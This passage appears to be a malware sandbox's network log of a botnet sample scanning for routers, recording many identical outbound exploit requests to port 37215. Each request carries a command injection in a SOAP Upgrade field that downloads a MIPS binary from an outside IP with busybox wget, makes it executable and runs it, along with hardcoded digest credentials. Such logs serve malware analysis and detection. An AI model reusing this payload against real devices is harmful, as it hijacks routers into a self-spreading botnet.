2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          665192.168.2.153290658.80.220.12337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:51.616262913 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          666192.168.2.154088641.130.45.22337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:51.616660118 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          667192.168.2.155411641.102.136.21437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:51.617082119 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          668192.168.2.155546241.15.38.23637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:51.617103100 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          669192.168.2.155108441.200.75.14837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:51.617630959 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          670192.168.2.1558462197.168.123.14437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:51.617665052 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          671192.168.2.155364465.180.43.17337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:51.617854118 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          672192.168.2.1558720112.23.48.12837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:51.617891073 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          673192.168.2.1545918152.53.70.6737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:51.617891073 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          674192.168.2.153649241.137.159.25437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:51.617980003 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          675192.168.2.1552820157.56.231.24337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:51.620131016 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
